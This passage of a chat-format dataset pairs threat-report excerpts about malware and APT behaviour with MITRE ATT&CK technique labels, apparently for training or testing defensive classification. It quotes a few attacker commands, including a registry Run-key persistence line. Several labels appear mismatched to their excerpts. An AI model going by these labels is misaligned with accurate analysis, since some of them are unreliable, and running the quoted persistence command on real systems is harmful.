- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This spyware registers itself as a system service to ensure its automatic execution at every system startup by adding the following registry entries"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"net start\" and \"net stop\" commands can be used in Net to execute or stop Windows services."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors executed an encoded VBScript file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also moves the JS file to ‘Shell.NameSpace(28)’ (‘ssfLOCALAPPDATA’ – ‘\\AppData\\Local’) and creates a scheduled task to use WScript to execute the file at every user log on. The installation routine then copies the keylogger to the registry, sets the uid + 0 flag to 1 to indicate that installation was completed, and executes the scheduled task it created"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT"
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KARAE was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started"
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since the FoggyWeb loader version.dll is an unmanaged application, it cannot directly access the virtual runtime environment that the managed AD FS code is executed within. The loader overcomes this limitation and loads the backdoor alongside the AD FS code by leveraging the CLR hosting interfaces and APIs to access the virtual runtime environment within which the AD FS code is executed"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 clears Window Event logs and Sysmon logs from the system."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec is capable of using ICMP, TCP, and UDP for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The decompressed PowerShell payload has some similarities to the PowerShell Empire agent, such as the use of a jitter value and commands referred to by job ID, but we do not have conclusive evidence that the author of this tool used Empire as a basis for their tool"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download files from the C2 server to the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has developed its own unique malware for use in operations."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More specifically, Ramsay looks for any of two given encoded Hardware Profile GUIDs. One of these GUIDs is hardcoded as shown in Figure 14, while the other is dynamically generated based on the compromised victim’s machine. If any of the subject identifiers are found, parsing for a command signature will be attempted"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET uses a shell script to execute Mach-o files and \"osacompile\" commands such as, \"osacompile -x -o xcode.app main.applescript\"."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HELLOKITTY can enumerate logical drives on a target system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can query \"Windows\\CurrentVersion\\Uninstall\" for installed applications."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle can collect the user name from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is able to steal autofill information from web browsers, cookies, saved credit cards, browser history, coin wallets and Telegram databases. "
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The APT1 group is known to have used RDP during operations."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner issues a series of commands to configure the victim’s machine to mine cryptocurrency and maintain persistence (Figure 6). The program xmrig2 is a Mach-O executable for mining cryptocurrency. As seen in Figure 7, the address “k1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H” has considerable mining performance. It has been ranked as a top miner in the Maruru mining pool (koto-pool.work). The cryptocurrency mined is called Koto, which is a Zcash-based anonymous cryptocurrency. The has addresses in Figure 8 use the “Yescrypt” algorithm which is good for CPU miners but not ideal for GPU miners. This is ideal for malware as the victim hosts are not guaranteed to have discrete GPUs installed in them but are guaranteed to have a CPU available. We believe the malware authors may have intentionally used this filename to create confusion since the miner is actually mining the Koto cryptocurrency"
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors uses zip to pack collected files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony has sent collected information to the C2 via HTTP POST request."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting, again attempting to extract all Word documents"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copies files from removable drives to C:\\system."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs timestomping of a CAB file it creates."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT has the capability to log keystrokes from the victim’s machine, both offline and online."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads and installs Tor via homebrew."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Threat Group-3390 tool can use WMI to execute a binary."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once a user has double-clicked the embedded image, the form executes a VB setup script"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The discovery modules used with Duqu can collect information on process details."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm [4"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The stage 2 payload for the macOS X malware was decoded and analyzed. The stage 2 malware has a variety of functionalities. Most importantly, it checks in with a C2 and, after connecting to the C2, can send or receive a payload, read and write files, execute commands via the terminal, etc"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prior to executing BOOMMIC APT29 was observed creating persistence via a registry key for “Java Update” that would execute jucheck.exe from the directory that contained version.dll and the BOOMMIC payload. Figure 19: BOOMMIC Persistence reg add HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Java Update\" /t REG_SZ /d \"c:\\users\\\\appdata\\local\\Java\\jucheck.exe\"\""
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN collects data stored in the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can communicate over multiple C2 hosts."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server. The primary contents of the MSI package were"
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Summary In the past few months, Unit 42 has observed the Patchwork group, alternatively known as Dropping Elephant and Monsoon, conducting campaigns against targets located in the Indian subcontinent. Patchwork threat actors utilized a pair of EPS exploits rolled into legitimate, albeit malicious, documents in order to propagate their updated BADNEWS payload. The use of weaponized legitimate documents is a longstanding operational standard of this group. The BADNEWS malware payload, which these malicious documents ultimately deliver, has been updated since the last public report in December 2017. These changes to BADNEWS, as well as the use of recent EPS-based exploits, demonstrate that the group are actively updating their toolsets in efforts to stay ahead of the security community. In this posting, we detail our findings and document these changes. Delivery The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities. Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability, however in late January 2018 when, paradoxically, newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability. The lures are primarily documents of interest to Pakistani nuclear organizations and the Pakistani military as can be seen in the images below"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely invoke an encoded PowerShell command on target systems to execute the payload"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally we see a cmd.exe process launched and used for process injection using the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs, as with the first finding of ROKRAT they continue to use similar Windows APIs"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer has the ability to collect the hostname and OS information from an infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This thread searches for for files with the following extensions on removable drives and copies them to ‘c:\\system’ every 5 seconds"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1083 - File and Directory Discovery', 'T1074.001 - Data Staged: Local Data Staging', 'T1119 - Automated Collection', 'T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In 2020, Pawn Storm often tries to obfuscate these brute force attempts by routing their attack traffic over Tor and VPN servers. In a Microsoft article about brute-forcing Office365 credentials over Tor, Microsoft attributed the activities to Strontium, which is another name for Pawn Storm. These brute force attacks started in 2019, and then we could firmly attribute them to Pawn Storm because we could cross-relate the extensive probing of Microsoft Autodiscover servers around the world with high-confidence indicators of the group’s more traditional attack methods (spear phishing and credential phishing"
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT collects the CPU information, OS information, and system language."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy can inject a malicious DLL into a process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As discussed in the delivery document analysis above, depending on the OS architecture either of the embedded KerrDown DLLs will be dropped in the victim machine. The DLL is dropped in the directory location ‘Users\\Administrator\\AppData\\Roaming\\’ as ‘main_background.png’. The DLL retrieves the payload from the URL, decrypts it by using DES algorithm and execute it in the memory. Therefore, it is observed that only the KerrDown DLL downloader is saved in the system and the payload directly gets executed in the memory without being written in the system. Table 1 shows the URL the downloader will attempt to download the payload from depending on the OS architecture of the victim machine"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2: Sofacy Fysbis capability related leakage through strings Figure 2 shows interactive status / feedback strings that can give a defender an initial profile of capabilities"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the system is a 64-bit version of Windows, it downloads and executes a specific 64-bit version of the malware thanks to a powershell script"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has the ability to use TCP and UDP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has infected victims using watering holes."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpicyOmelette can download malicious files from threat actor controlled AWS URL's."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear employs a modular approach to its malware. It utilizes a DLL loader to decrypt and execute an RC4-encrypted payload. Sometimes, the hardcoded file paths of the encrypted payloads are not under Windows native directories (e.g. It is also possible that the attackers use Waterbear as a secondary payload to help maintain presence after gaining some levels of access to the targets’ systems. The evidence is that Waterbear frequently uses internal IPs as its own C&C servers (for instance, b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361 uses an internal IP address of 10[.]0[.]0[.]211 as its C&C server"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In between then and now there has been a lot of rumour and debate about all aspects of this attack with many truths and mistruths being carried in public. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Clear all system event logs. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the “attack surface” by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. Potential attack scenario: When using this vulnerability the most likely attack vector used in this case is targeted emails containing legitimate looking PDF documents sent to high level employees"
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XAgentOSX contains the getInstalledAPP function to run \"ls -la /Applications\" to gather what applications are installed."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK can switch to a new C2 channel if the current one is broken."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main loader and privilege escalation tool, “autorun.exe” fires up a special dropper, which is actually an Equation Group DoubleFantasy implant installer. The installer is stored as “show.dll” in the “Presentation” folder of the CDROM."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encodes commands from the control server using a range of characters and gzip."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
